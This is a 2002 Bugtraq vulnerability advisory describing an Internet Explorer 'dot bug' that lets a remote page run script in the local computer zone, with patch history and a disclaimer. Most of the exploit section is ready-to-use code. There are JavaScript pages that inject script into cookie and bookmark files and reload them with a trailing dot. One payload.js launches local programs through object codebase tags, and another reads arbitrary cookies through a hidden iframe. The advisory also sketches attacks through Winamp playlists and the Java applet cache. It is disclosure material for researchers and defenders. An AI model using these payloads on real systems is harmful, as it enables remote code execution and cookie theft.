IE dot bug - Sandblad advisory #7

From: Andreas Sandblad (sandblad@acc.umu.se)
Date: 05/19/02


Date: Sun, 19 May 2002 16:45:15 +0200 (CEST)
From: Andreas Sandblad <sandblad@acc.umu.se>
To: bugtraq@securityfocus.com


                  - Sandblad advisory #7 -

---..---..---..---..---..---..---..---..---..---..---..---..----
Title: IE dot bug
            (updated IE: Remote webpage can script in local zone)
Date: [2002-05-19]
Software: Internet Explorer
Patches: MS02-023, MS02-015 (issue still not 100% solved)
Vendor: http://www.microsoft.com/ _ _
Workaround: Disable active scripting o' \,=./ `o
Author: Andreas Sandblad, sandblad@acc.umu.se (o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---

HISTORY:
========
[2002-02-17]
Initially reported to Microsoft about the dot bug vulnerability.

[2002-03-28]
Microsoft released patch:
"Cookie-based Script Execution" (MS02-015)
Solution: Files in the cookie directory are not treated as beeing in the
local computer zone.
Problem: Not fixing the real issue. Still possible to use the cookie based
attack to read other cookies.

[2002-03-30]
A non disclosure advisory sent to Bugtraq:
"IE: Remote webpage can script in local zone"
http://online.securityfocus.com/archive/1/265459

[2002-05-15]
Microsoft released patch:
"Script within Cookies Reading Cookies" (MS02-023)
Solution: Put files in the cookie directory in the restrictive zone
(disables exploit to read other cookies). Attempt to disable that local
files with .txt extentension can be parsed as a html document using the
dot bug.
Problem: Real issue still not fixed. By appending " ." instead of "."
files with .txt extension can be treated as html documents.

DESCRIPTION:
============
In order for IE to parse a local file as a html document the filename
extension must be associated with html documents (normally .htm and
.html). Also html code must be found somewhere in the beginning of the
file (IE will only scan a certain amount of bytes in the file). This is
good security because several types of userdata is stored in local files
(cookies, favorites/bookmarks, application userdata etc). The problem is
that IE can be tricked into thinking that a local file is a html document
regardless of file extension.

The trick is to simply add a dot "." when linking to a local filename. If
we link to a file with the .txt extension then we must add " ." instead as
of patch MS02-023. To test this behaviour simply create a file called
c:/test.txt with some html code in it. Now compare the difference in parse
behaviour by typing the following in the adress field:
about:test.txt .
and compare it with:
about:test.txt

The exploit method is the following:
1. Find a file storing part of data possible to control (generated by IE
or any other third part software).
2. Make sure the data is inserted in the first x amount of bytes.
3. Inject html+script code in the file and link to it together with a dot
(or space + dot for .txt files). The script will be operating in the local
computer zone.

EXPLOIT:
========
----------------------------------------------------------------
NOTE: Please note that you MUST change some variables
      in order for the exploits to work. The following exploits
      has only been tested on IE 6.0. Because the exploits
      require knowledge of exact path to files, they may fail
      on non default systems.
----------------------------------------------------------------

--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-
METHOD: Cookie based script execution
IMPACT: Scripting in local computer zone - running local
         programs, running signed programs from a webpage,
         reading local files.
PATCH: MS02-015 released 28 March 2002 will stop this exploit.
NOTE: - This exploit is designed for Win 98/ME. In order
         to work on win 2000/XP username must be known.
         Please change cookieFile and scriptFile.
         - Code must be in a directory called "unique" to
         get correct name of cookie file.
----------------------------------------------------------------

- - - - - - - - - - CUT HERE - - - - - - - - - - - - - - - - - -
<script>
//cookieFile = "c:/DOCUME~1/ADMINI~1/cookies/administrator@unique[1].txt";
//cookieFile = "c:/windows/cookies/anyuser@unique[1].txt";
//scriptFile = "http://www.microsoft.com/unique/payload.js";

function injectCookie(){
  code = "<html><script src='"+scriptFile+"'><"+"/script><"+"/html>";
  document.cookie = "evil="+code+"; expires=Fri, 13 Dec 2003 23:59:59
GMT;";
  alert("*** Cookie injected! ***");
}
function loadCookie(){
  alert("*** Loading cookie! ***");
  document.location="file:///"+cookieFile+"."; // the important dot!
}
</script>

<a href="javascript:injectCookie()">injectCookie() step 1.</a><br>
<a href="javascript:loadCookie()">loadCookie() step 2.</a>
- - - - - - - - - - CUT HERE - - - - - - - - - - - - - - - - - -

payload.js:
- - - - - - - - - - CUT HERE - - - - - - - - - - - - - - - - - -
files = new Array(
  "c:/windows/system32/winmine.exe",
  "c:/windows/winmine.exe",
  "c:/winnt/system32/winmine.exe"
);
function init(){
  for (i=0;files[i];i++)
  {
    s = '<object classid=CLSID:12345678-1234-1234-1234-123456789012 ';
    s+= 'codebase="file:///'+files[i]+'" style=display:none></object>';
    document.write("<html>"+s+"<"+"/html>");
  }
}
window.onload=init;
- - - - - - - - - - CUT HERE - - - - - - - - - - - - - - - - - -

--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-
METHOD: Cookie based cookie reading
IMPACT: Reading content of arbitrary cookie.
PATCH: MS02-023 released 15 May 2002 will stop this exploit.
NOTE: - Use the same exploit as for the
         "Cookie based script execution", but replace
         payload.js with code below.
         - cookieRead is set to read your google cookie.
         The cookie must of course exist. cookieRead must be
         altered.
----------------------------------------------------------------

payload.js:
- - - - - - - - - - CUT HERE - - - - - - - - - - - - - - - - - -
//cookieRead = "administrator@google[1].txt";
//cookieRead = "anyuser@google[1].txt";
s = '<iframe name=i src='+cookieRead+' style=display:none onload=';
s+= 'alert(i.document.body.innerText)></iframe>';
document.write(s);
- - - - - - - - - - CUT HERE - - - - - - - - - - - - - - - - - -

--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-
METHOD: Favorite/bookmark based script execution
IMPACT: Scripting in local computer zone.
PATCH: NONE
NOTE: - This exploit is designed for Win 98/ME. In order
         to work on win 2000/XP username must be known.
         Please change bookmarkFile and scriptFile.
         - Use the same payload.js as in the exploit
         "Cookie based script execution".
----------------------------------------------------------------

- - - - - - - - - - CUT HERE - - - - - - - - - - - - - - - - - -
<script>
//bookmarkFile = "c:/DOCUME~1/ADMINI~1/favorites/unique.url";
//bookmarkFile = "c:/windows/favorites/unique.url";
//scriptFile = "http://www.microsoft.com/unique/payload.js";

function injectBookmark(){
  code = '<html><script>document.scripts[0].src="';
  code += scriptFile+'"<'+'/script><'+'/html>';
  window.external.AddFavorite('http://'+code,'unique');
}
function loadBookmark(){
  alert("*** Loading bookmark file! ***");
  document.location="file:///"+bookmarkFile+"."; // the important dot!
}
</script>

<a href="javascript:injectBookmark()">injectBookmark() step 1.</a><br>
<a href="javascript:loadBookmark()">loadBookmark() step 2.</a>
- - - - - - - - - - CUT HERE - - - - - - - - - - - - - - - - - -

--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-
METHOD: Third part software based script execution
IMPACT: Scripting in local computer zone. For some softwares
         execute arbitrary remote programs.
PATCH: NONE
NOTE: Only a few third part softwares investigated.
----------------------------------------------------------------
Winamp:
Winamp stores current playlist in "c:/program files/winamp/winamp.m3u".
The playlist will contain artist name and song title. If we inject
html/script code in the artist/title of a mp3 file (ID3v2 tag) that is
loaded remotely, the new playlist file will be saved together with html
code. Using the dotbug trick the local playlist file can be loaded and
operate in the local zone. Since the playlist file will contain the exact
path to the "temporarily internet folder", we can using the old ".chm
helpfile attack" or the codebase of object tag run arbitrary code.

Java(TM) 2 SDK, Standard Edition, v 1.4.0:
Classfiles and graphics for applets are stored in
%userprofile%\.jpi_cache\file\1.0\
Exploit method: Insert html/script code in a gif picture used in a java
applet loaded from remote webpage. The local filename of the picture will
be named something like (random characters):
exploita.gif-41615d6-26f536aa.gif
This is equal to EXPLOI~1.GIF (old filesystem support). Use the dot bug
trick to load the file as a html document. Script will be operating in the
local computer zone.

Disclaimer:
===========
Andreas Sandblad is not responsible for the misuse of the
information provided in this advisory. The opinions expressed
are my own and not of any company. In no event shall the author
be liable for any damages whatsoever arising out of or in
connection with the use or spread of this advisory. Any use of
the information is at the user's own risk.

Old advisories:
===============
#6 [2002-05-15] "Opera javascript protocoll vulnerability"
http://online.securityfocus.com/archive/1/272583
#5 [2002-04-26] "Mp3 file can execute code in Winamp."
http://online.securityfocus.com/archive/1/269724
#4 [2002-04-15] "Using the backbutton in IE is dangerous."
http://online.securityfocus.com/archive/1/267561

Feedback:
=========
(I will be away 22-26 May)
Please send suggestions and comments to: _ _
sandblad@acc.umu.se o' \,=./ `o
                                                    (o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---
Andreas Sandblad,
student in Engineering Physics at Umea University, Sweden.
-/---/---/---/---/---/---/---/---/---/---/---/---/---/---/---/--



Relevant Pages